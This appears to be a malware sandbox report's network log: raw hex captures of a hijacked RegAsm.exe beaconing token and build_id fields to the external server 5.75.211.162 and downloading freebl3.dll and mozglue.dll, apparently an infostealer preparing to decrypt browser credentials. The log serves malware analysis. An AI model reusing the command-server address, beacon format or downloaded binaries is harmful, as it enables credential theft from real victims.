2024-09-26 20:56:31 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:34 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:34 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------DBFHDBGIEBFIIDGCBFBKCont
2024-09-26 20:56:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:34 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:35 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:35 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------HIDAAKEGDBFIJJKFHCFBCont
2024-09-26 20:56:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:36 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:36 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:36 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------HIDAAKEGDBFIJJKFHCFBCont
2024-09-26 20:56:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49750	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:37 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:37 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 33 36 31 36 66 37 38 62 36 33 30 32 61 32 39 33 63 38 32 65 33 35 30 31 62 37 30 33 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="token"c23616f78b6302a293c82e3501b7036e------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------GHJJDGHCBGDHIECBGIDACont
2024-09-26 20:56:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:56:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:38 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:38 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:38 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:56:38 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:56:38 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-26 20:56:38 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-26 20:56:38 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-26 20:56:39 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-26 20:56:39 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-26 20:56:39 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-26 20:56:39 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-26 20:56:39 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-26 20:56:39 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-26 20:56:39 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49752	5.75.211.162	443	7476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:56:40 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:56:40 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:56:40 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:56:40 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:56:40 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-26 20:56:40 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
